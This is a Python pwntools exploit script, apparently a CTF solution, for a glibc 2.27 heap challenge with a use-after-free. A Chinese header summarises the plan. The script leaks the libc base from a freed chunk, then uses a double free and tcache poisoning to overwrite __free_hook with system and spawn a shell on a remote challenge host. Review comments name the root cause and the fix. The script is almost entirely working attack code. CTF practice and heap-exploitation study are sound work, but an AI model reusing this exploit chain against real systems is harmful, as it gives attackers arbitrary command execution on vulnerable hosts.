没有 edit 功能的 libc-2.27 下的 UAF 堆题,先泄露 libc_base,再利用 tcache bin attack 打 free_hook 为 system
from pwn import *
from struct import pack
from ctypes import *
import hashlib
def s(a):
    """Send *a* to the target tube as-is (pwntools ``send``, no newline appended)."""
    payload = a
    p.send(payload)
def sa(a, b):
    """Wait until *a* has been received, then send *b* (pwntools ``sendafter``)."""
    delim, payload = a, b
    p.sendafter(delim, payload)
def sl(a):
    """Send *a* followed by a newline (pwntools ``sendline``)."""
    line = a
    p.sendline(line)
def sla(a, b):
    """Wait until *a* has been received, then send *b* plus a newline (``sendlineafter``)."""
    delim, line = a, b
    p.sendlineafter(delim, line)
def r():
    """Read whatever is currently available on the tube and discard it."""
    _ = p.recv()
def pr():
    """Read whatever is currently available on the tube and print it as raw bytes."""
    chunk = p.recv()
    print(chunk)
def rl(a):
    """Read from the tube up to and including delimiter *a* and return what was read."""
    data = p.recvuntil(a)
    return data
def inter():
    """Hand the tube over to the user (pwntools interactive mode)."""
    tube = p
    tube.interactive()
def debug():
    """Attach gdb to the live target, then block until the user presses a key.

    Only meaningful for the local ``process()`` variant of ``p``; it is not
    called in the remote run below.
    """
    target = p
    gdb.attach(target)
    pause()
def get_addr():
    """Read up to the next 0x7f byte and decode the last 6 bytes as a little-endian u64.

    Returns:
        The 6 received bytes zero-padded to 8 and unpacked with ``u64``.  If
        ``recvuntil`` hands back an empty buffer, the padding makes this decode
        to 0 rather than raising, so callers should sanity-check the result.
    """
    raw = p.recvuntil(b'\x7f')
    tail = raw[-6:]
    padded = tail.ljust(8, b'\x00')
    return u64(padded)
def get_sb():
    """Return ``(system_addr, binsh_addr)`` rebased on the global ``libc_base``.

    ``libc_base`` must already have been set by the leak stage; calling this
    earlier raises ``NameError``.
    """
    system_addr = libc_base + libc.sym['system']
    binsh_addr = libc_base + next(libc.search(b'/bin/sh\x00'))
    return system_addr, binsh_addr
# log_level='debug' makes pwntools log every byte sent and received on the tube.
context(os='linux', arch='amd64', log_level='debug')
#p = process('./pwn')
# Challenge instance; swap in the process() line above for a local run (debug() assumes that).
p = remote('node2.anna.nssctf.cn', 28567)
elf = ELF('./pwn')
# Every symbol offset used below (__malloc_hook, __free_hook, system) comes from
# this file.  The path is specific to the author's machine, and the build must be
# the one the remote service links against (2.27-3ubuntu1.4 per the directory
# name); any other libc invalidates the hard-coded 0x70 correction in the leak.
libc = ELF('/home/w1nd/Desktop/glibc-all-in-one/libs/2.27-3ubuntu1.4_amd64/libc.so.6')
def add(idx, size, data=b'a'):
    """Menu option 1 (add): allocate slot *idx* with *size* bytes and write *data* into it.

    Each answer is sent with a trailing newline after the ``>> `` prompt;
    *idx* and *size* are sent as their decimal string form.
    """
    for answer in (b'1', str(idx), str(size), data):
        sla(b'>> ', answer)
def show(idx):
    """Menu option 2 (show): ask the program to print the contents of slot *idx*."""
    for answer in (b'2', str(idx)):
        sla(b'>> ', answer)
def free(idx):
    """Menu option 3 (free): release slot *idx*.

    The script later frees the same index twice and shows a freed slot, so the
    target evidently does not clear or validate its slot table on free.
    """
    for answer in (b'3', str(idx)):
        sla(b'>> ', answer)
# leak libc_base
# Nine 0x80-byte slots are allocated and the first eight freed; slot 7 is then
# shown even though it has just been freed, i.e. the program reads from a freed
# chunk (the UAF the header refers to).  The leaked value is corrected by a
# fixed 0x70 and the __malloc_hook offset of the loaded libc.
# NOTE(review): that 0x70 is tied to the 2.27-3ubuntu1.4 build; re-derive it
# for any other libc rather than reusing it.
for i in range(9):
    add(i, 0x80)
for i in range(8):
    free(i)
show(7)
libc_base = get_addr() - 0x70 - libc.sym['__malloc_hook']
# tcache bin attack
# Addresses rebased on the leaked libc_base: the hook that gets overwritten and
# the function it is pointed at.
free_hook = libc_base + libc.sym['__free_hook']
system = libc_base + libc.sym['system']
for i in range(10):
    add(i, 0x60) # index 0 ~ 9
for i in range(8):
    free(i) # index 0 ~ 7
free(9)
# Slot 7 was already freed in the loop above; this is a second free of the same
# slot.  Root cause the challenge exploits: the slot table is not cleared on
# free, so a stale index can be freed and shown again.  Nulling the slot on free
# would close both the leak above and this double free.
free(7)
for i in range(7):
    add(i, 0x60)
# NOTE(review): the sequence below assumes the freed chunks are handed back in a
# glibc-2.27-specific order; it is not portable across libc versions.
add(0, 0x60, p64(free_hook))
add(0, 0x60)
add(0, 0x60, b'/bin/sh\x00')
add(1, 0x60, p64(system))
# pwn
# Freeing slot 0 (which now holds the '/bin/sh' string) is intended to trigger
# the hook written above.
free(0)
inter()
# Only reached once the interactive session ends; printed after the fact.
print(' libc_base -> ', hex(libc_base))
#debug()
